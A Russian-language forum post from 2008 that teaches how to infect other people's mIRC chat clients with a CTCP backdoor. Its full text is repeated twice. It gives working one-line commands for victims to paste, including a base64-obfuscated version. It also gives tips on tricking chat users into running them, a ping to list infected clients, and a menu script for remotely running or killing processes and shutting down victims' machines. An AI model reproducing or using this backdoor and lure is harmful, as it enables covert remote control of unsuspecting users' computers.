CrazyStudentS_Mi}{
28.04.2008, 12:55
Интернет кишит статьями о том что можно заразить mirc клиент простейшим бэкдором, который будет работать через ctcp запросы, везде он описывается так:
//write conf.mrc ctcp 1:*:?:$1- | Load -rs conf.mrc
Это должна набрать наша жертва, тоесть создается файл-скрипт и подгружается в клиент.Но есть один огромный минус такого бэкдора - все наши ctcp запросы будут палиться в статусе. Как же этого избежать? Если покопаться в хэлпе то нетрудно найти алиас haltdef блокирующий стандартный ответ на вызванную команду\алиас\функцию.
Чуть чуть поэкпериментировав пришли к такому бэкдору
//write config.mrc ctcp ^*:*:*: { haltdef | $1- } | //Load -rs config.mrc
Но для человека хоть чуточку понимающего в скриптинге\кодинге покажется опасной такая строка.
Лучше просто обходить бдительных людей стороной или брать их на слабо :))
Благо mirc богат своими функциями и позволяет кодировать команды. В результате имеем такой код бэкдора //write conf.mrc $decode(Y3RjcCBeKjoqOio6IHsgaGFsdGRlZiB8ICQxLSB9,m ) | load -rs conf.mrc
Такое кажется втюхать соседям по чату труднее, но это только кажется, ведь все проявляют интерес что же это, можнопросто написать это на канале и найдутся те кто посмотрят, что она выполняет.
После того как вы попестрите этим сообщением нужно собирать первые плоды - например ctcp запрос на канал, который выявит заразившихся: /ctcp #chan /ping $me
После сбора урожая в отдельный текстовичок можно приступить к работе с конкретными особями.
Вставим этот код в Скрипты(Alt+R)->Меню->ПриватТроян
.выполнить:/ctcp $$1 $$?="ВВеди чего хочешь делать"
.запуск процесса:/ctcp $$1 /run $$?="ВВеди название или путь к процессу"
.остановка процесса:/ctcp $$1 /run taskkill /F /IM $$?="ВВеди название или путь к процессу"
.смена ника:/ctcp $$1 /nick $$?="ВВеди ник"
.зайти на канал:/ctcp $$1 /join $$?="ВВеди канал"
.покинуть канал:/ctcp $$1 /part $$?="ВВеди канал"
.сказать:/ctcp $$1 /say $$?="Что сказать?"
.вырубить винду:/ctcp $$1 /run exitwindows
.перезагрузить комп:/ctcp $$1 /run shutdown -r -f -m
Удачного веселья!
//write conf.mrc ctcp 1:*:?:$1- | Load -rs conf.mrc
Это должна набрать наша жертва, тоесть создается файл-скрипт и подгружается в клиент.Но есть один огромный минус такого бэкдора - все наши ctcp запросы будут палиться в статусе. Как же этого избежать? Если покопаться в хэлпе то нетрудно найти алиас haltdef блокирующий стандартный ответ на вызванную команду\алиас\функцию.
Чуть чуть поэкпериментировав пришли к такому бэкдору
//write config.mrc ctcp ^*:*:*: { haltdef | $1- } | //Load -rs config.mrc
Но для человека хоть чуточку понимающего в скриптинге\кодинге покажется опасной такая строка.
Лучше просто обходить бдительных людей стороной или брать их на слабо :))
Благо mirc богат своими функциями и позволяет кодировать команды. В результате имеем такой код бэкдора //write conf.mrc $decode(Y3RjcCBeKjoqOio6IHsgaGFsdGRlZiB8ICQxLSB9,m ) | load -rs conf.mrc
Такое кажется втюхать соседям по чату труднее, но это только кажется, ведь все проявляют интерес что же это, можнопросто написать это на канале и найдутся те кто посмотрят, что она выполняет.
После того как вы попестрите этим сообщением нужно собирать первые плоды - например ctcp запрос на канал, который выявит заразившихся: /ctcp #chan /ping $me
После сбора урожая в отдельный текстовичок можно приступить к работе с конкретными особями.
Вставим этот код в Скрипты(Alt+R)->Меню->ПриватТроян
.выполнить:/ctcp $$1 $$?="ВВеди чего хочешь делать"
.запуск процесса:/ctcp $$1 /run $$?="ВВеди название или путь к процессу"
.остановка процесса:/ctcp $$1 /run taskkill /F /IM $$?="ВВеди название или путь к процессу"
.смена ника:/ctcp $$1 /nick $$?="ВВеди ник"
.зайти на канал:/ctcp $$1 /join $$?="ВВеди канал"
.покинуть канал:/ctcp $$1 /part $$?="ВВеди канал"
.сказать:/ctcp $$1 /say $$?="Что сказать?"
.вырубить винду:/ctcp $$1 /run exitwindows
.перезагрузить комп:/ctcp $$1 /run shutdown -r -f -m
Удачного веселья!